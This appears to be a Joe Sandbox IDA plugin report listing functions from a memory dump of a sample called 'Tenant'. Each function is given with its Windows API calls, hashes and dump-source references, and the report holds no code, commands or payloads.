                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 404d0ae7d3d19f47025ef8af2b2d7eb50f1283d1844cce0b73207ea6b78e8e57
                                                                                        • Instruction ID: 860ad4554c3fb58db9f1ca7ad4f70ce08c915467b1fc0829eecb225ef9607b8e
                                                                                        • Opcode Fuzzy Hash: 404d0ae7d3d19f47025ef8af2b2d7eb50f1283d1844cce0b73207ea6b78e8e57
                                                                                        • Instruction Fuzzy Hash: E9114839900218FFEB10EF95C985FAEBBB8FB48710F204091FA00B7290D6716E10DB90
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00AA16B4
                                                                                        • GetClientRect.USER32(?,?), ref: 00ADB93C
                                                                                        • GetCursorPos.USER32(?), ref: 00ADB946
                                                                                        • ScreenToClient.USER32(?,?), ref: 00ADB951
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: dd0c42998766ccf3ef15cc23c30cc8179d45aa1a9b411e588d617c1560a4371c
                                                                                        • Instruction ID: 91604ca3122a450cadd23a47c08e50007782549fab3937cd5aca0358b67b420c
                                                                                        • Opcode Fuzzy Hash: dd0c42998766ccf3ef15cc23c30cc8179d45aa1a9b411e588d617c1560a4371c
                                                                                        • Instruction Fuzzy Hash: 2F112835A10119BBCB10EF58D999DBE77B8EF06301F140456F941E7290DB34BA51CBA1
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA214F
                                                                                        • GetStockObject.GDI32(00000011), ref: 00AA2163
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA216D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 046a569060183ee826fd745a8cbca5e469a524ca780b1002f185a9cc7a3cfd78
                                                                                        • Instruction ID: a809c02df83b406f2ca87656ccb87d1cf769daf8975c2b33f61d8ef774ab6896
                                                                                        • Opcode Fuzzy Hash: 046a569060183ee826fd745a8cbca5e469a524ca780b1002f185a9cc7a3cfd78
                                                                                        • Instruction Fuzzy Hash: 5111AD72101509BFDF025F949C55EEBBB69EF59354F150212FA0453190CB31DC60EFA0
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B004EC,?,00B0153F,?,00008000), ref: 00B0195E
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B004EC,?,00B0153F,?,00008000), ref: 00B01983
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B004EC,?,00B0153F,?,00008000), ref: 00B0198D
                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00B004EC,?,00B0153F,?,00008000), ref: 00B019C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • String ID:
                                                                                        • API String ID: 2875609808-0
                                                                                        • Opcode ID: 795f019c1493ecea3acc1609edd4ad5ab6cce50c65af59926c4551909a4d0e59
                                                                                        • Instruction ID: 17b3f1d3417b50c118a2ac94297dcce5f09c5ffc178ae0107706cdb95f5c4bcf
                                                                                        • Opcode Fuzzy Hash: 795f019c1493ecea3acc1609edd4ad5ab6cce50c65af59926c4551909a4d0e59
                                                                                        • Instruction Fuzzy Hash: 79113031D0461DDBCF04AFA9D998BEDBFB8FF08751F114595E940B2280CB3095518B91
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B2E1EA
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00B2E201
                                                                                        • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00B2E216
                                                                                        • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00B2E234
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                        • String ID:
                                                                                        • API String ID: 1352324309-0
                                                                                        • Opcode ID: dfa2f7c8ab5c9f83ed94be7e2c16037862c49e6a3851dcbc147c12a19364d485
                                                                                        • Instruction ID: edc3bec711bf6bc74abf55f10849efd38fd3f3686531a7f70bc4ad248be23212
                                                                                        • Opcode Fuzzy Hash: dfa2f7c8ab5c9f83ed94be7e2c16037862c49e6a3851dcbc147c12a19364d485
                                                                                        • Instruction Fuzzy Hash: A1115EB5205324DBE7309F52FD48F97BBFCEF04B00F108599A62AD6550D7B0E5049BA1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction ID: c84e2adca8942656453d6fe71073b3b4c94b8a0ef6c91d2cb90d4282332277d7
                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction Fuzzy Hash: 4801953204818EBBCF1A5F84CC41CED3F22BB19340B048516FE1958231E736C9B1AB81
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B2B956
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B2B96E
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B2B992
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2B9AD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: 4e5fbfbb6f4a0a442d3158df6ea3b5431dddebd44e3d6492a7947cc51d54cd8c
                                                                                        • Instruction ID: 6f3fefe888e288e1528d4e6f09c7002e01135916b5b6f794f012555a3ba0d899
                                                                                        • Opcode Fuzzy Hash: 4e5fbfbb6f4a0a442d3158df6ea3b5431dddebd44e3d6492a7947cc51d54cd8c
                                                                                        • Instruction Fuzzy Hash: DD1174B9D00209EFDB41DF98D885AEEBBF9FF48310F108156E914E3614DB31AA618F50
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B2BCB6
                                                                                        • _memset.LIBCMT ref: 00B2BCC5
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B68F20,00B68F64), ref: 00B2BCF4
                                                                                        • CloseHandle.KERNEL32 ref: 00B2BD06
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3277943733-0
                                                                                        • Opcode ID: ca4c9f16b44caadf78eb1cc2482c124e5f2af4cc132a543716e9afaf3575c588
                                                                                        • Instruction ID: 5bc08357f83b7a94b2714b28f362ddecabdae7f9627e07b43b6500ad1b6c4216
                                                                                        • Opcode Fuzzy Hash: ca4c9f16b44caadf78eb1cc2482c124e5f2af4cc132a543716e9afaf3575c588
                                                                                        • Instruction Fuzzy Hash: 18F05EB35403047FE7503761AC25FBB3A9DEB08754F004921FA08DA1A2DFB9481097A8
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00B071A1
                                                                                          • Part of subcall function 00B07C7F: _memset.LIBCMT ref: 00B07CB4
                                                                                        • _memmove.LIBCMT ref: 00B071C4
                                                                                        • _memset.LIBCMT ref: 00B071D1
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00B071E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 48991266-0
                                                                                        • Opcode ID: 55b5423f4a369859336159e35c01fa5e873f263bb52e4fe437f4ca87752cf57d
                                                                                        • Instruction ID: d2fc265be703e535826ac4c0f4bbb415936e3f4a2a5eb4cd667d681260944c10
                                                                                        • Opcode Fuzzy Hash: 55b5423f4a369859336159e35c01fa5e873f263bb52e4fe437f4ca87752cf57d
                                                                                        • Instruction Fuzzy Hash: D6F03A3A200104ABCF116F55DC85F8ABB69EF49320F08C095FE085F26ACB31A911DBB4
                                                                                        APIs
                                                                                          • Part of subcall function 00AA16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA1729
                                                                                          • Part of subcall function 00AA16CF: SelectObject.GDI32(?,00000000), ref: 00AA1738
                                                                                          • Part of subcall function 00AA16CF: BeginPath.GDI32(?), ref: 00AA174F
                                                                                          • Part of subcall function 00AA16CF: SelectObject.GDI32(?,00000000), ref: 00AA1778
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B2C3E8
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00B2C3F5
                                                                                        • EndPath.GDI32(00000000), ref: 00B2C405
                                                                                        • StrokePath.GDI32(00000000), ref: 00B2C413
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 1539411459-0
                                                                                        • Opcode ID: 696754f54f063b96ea4bfc8a3e9b1421b9e0d44dc63017adfe1f17c414b82dc7
                                                                                        • Instruction ID: 14b4c823ce89e72c869ff1b2473ab0d559615b3eaeebe7195091d929fd99521c
                                                                                        • Opcode Fuzzy Hash: 696754f54f063b96ea4bfc8a3e9b1421b9e0d44dc63017adfe1f17c414b82dc7
                                                                                        • Instruction Fuzzy Hash: 2DF0BE31045228BBDB137F51AC0EFCE3F99AF06310F148040FA11671E28BB81961DFA9
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AFAA6F
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFAA82
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AFAA89
                                                                                        • AttachThreadInput.USER32(00000000), ref: 00AFAA90
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: 854ec097bec7aa7a9aaa9b59b1c23b1c2dafaed0fd9a9208b3a85cf14f71ed78
                                                                                        • Instruction ID: 5c119c028a58e76a004f40b9ce3cb1b26f7e5f717f4d5e511c184910f7bc256c
                                                                                        • Opcode Fuzzy Hash: 854ec097bec7aa7a9aaa9b59b1c23b1c2dafaed0fd9a9208b3a85cf14f71ed78
                                                                                        • Instruction Fuzzy Hash: FCE0397154522CBBDB216FA29D0DEEB3F1CEF267E1F108011F60D96050CB718554CBA0
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00AA260D
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00AA2617
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00AA262C
                                                                                        • GetStockObject.GDI32(00000005), ref: 00AA2634
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00ADC1C4
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00ADC1D1
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00ADC1EA
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00ADC203
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00ADC223
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ADC22E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 27f20c6249e5575116f1becfcde2d40c258da34729dbba300af71d9f89165994
                                                                                        • Instruction ID: 2e130784eed07039ea0dceae84bad58117c69ee2128907a3dd93cd0e1d5b870c
                                                                                        • Opcode Fuzzy Hash: 27f20c6249e5575116f1becfcde2d40c258da34729dbba300af71d9f89165994
                                                                                        • Instruction Fuzzy Hash: 75E0ED31104244BBDB222FA8AC08BDC3B10EF11332F208366FA69580E18B714A80DB11
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 00AF9339
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AF8F04), ref: 00AF9340
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AF8F04), ref: 00AF934D
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AF8F04), ref: 00AF9354
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: 0453d410fa492a2215211f3d792ecd9d94c243aaf28551ce961b7f8b35046bec
                                                                                        • Instruction ID: de4cd4c86dd62dce66261a6b2cd494fe2225ee7007ce211cac5a63cf6695e824
                                                                                        • Opcode Fuzzy Hash: 0453d410fa492a2215211f3d792ecd9d94c243aaf28551ce961b7f8b35046bec
                                                                                        • Instruction Fuzzy Hash: ADE086326112159FD7202FF15D0DF5B3B6CEF54791F204858B345CB090EB349444CB54
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00AE0679
                                                                                        • GetDC.USER32(00000000), ref: 00AE0683
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AE06A3
                                                                                        • ReleaseDC.USER32(?), ref: 00AE06C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 80b0cfb59e7a0b3b2848bc028bec38e5d551648ec8a36f1098f9ca89863f44ec
                                                                                        • Instruction ID: ba9e623ceacaced89182fd426f8a6ac64fe92976f9aabfa467035a05b55107a6
                                                                                        • Opcode Fuzzy Hash: 80b0cfb59e7a0b3b2848bc028bec38e5d551648ec8a36f1098f9ca89863f44ec
                                                                                        • Instruction Fuzzy Hash: 41E01AB1810204EFCB02AF70D819B5D7BF5EF8C310F218005F85AE7650CB7885519F50
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00AE068D
                                                                                        • GetDC.USER32(00000000), ref: 00AE0697
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AE06A3
                                                                                        • ReleaseDC.USER32(?), ref: 00AE06C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 2c5ac4538fc8b4b57197fca847c0147dfb801aadb0907b92d63f495cec3e9dad
                                                                                        • Instruction ID: 82f67b8af96472037e61e20701361dad2eda77136275f7e31d289854669eaed4
                                                                                        • Opcode Fuzzy Hash: 2c5ac4538fc8b4b57197fca847c0147dfb801aadb0907b92d63f495cec3e9dad
                                                                                        • Instruction Fuzzy Hash: 7AE012B1810204AFCB02AFB0D819A9EBBF5AF8C310F208008F95AE7250CB7895518F50
                                                                                        APIs
                                                                                          • Part of subcall function 00AB436A: _wcscpy.LIBCMT ref: 00AB438D
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • __wcsnicmp.LIBCMT ref: 00B0B670
                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B0B739
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                        • String ID: LPT
                                                                                        • API String ID: 3222508074-1350329615
                                                                                        • Opcode ID: 54d2fb995428357f4d0f48dcdb774a3e2953471661d041c0958d5d67b3399587
                                                                                        • Instruction ID: f8ef4707e6026f9ce7a557f497431456bfdee556ddd43c1bac8165cc971a29af
                                                                                        • Opcode Fuzzy Hash: 54d2fb995428357f4d0f48dcdb774a3e2953471661d041c0958d5d67b3399587
                                                                                        • Instruction Fuzzy Hash: EF619175A00219AFCB14EF94C991EAEBBF4EF49710F158099F506AB3D1DB70AE40CB94
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00AAE01E
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00AAE037
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
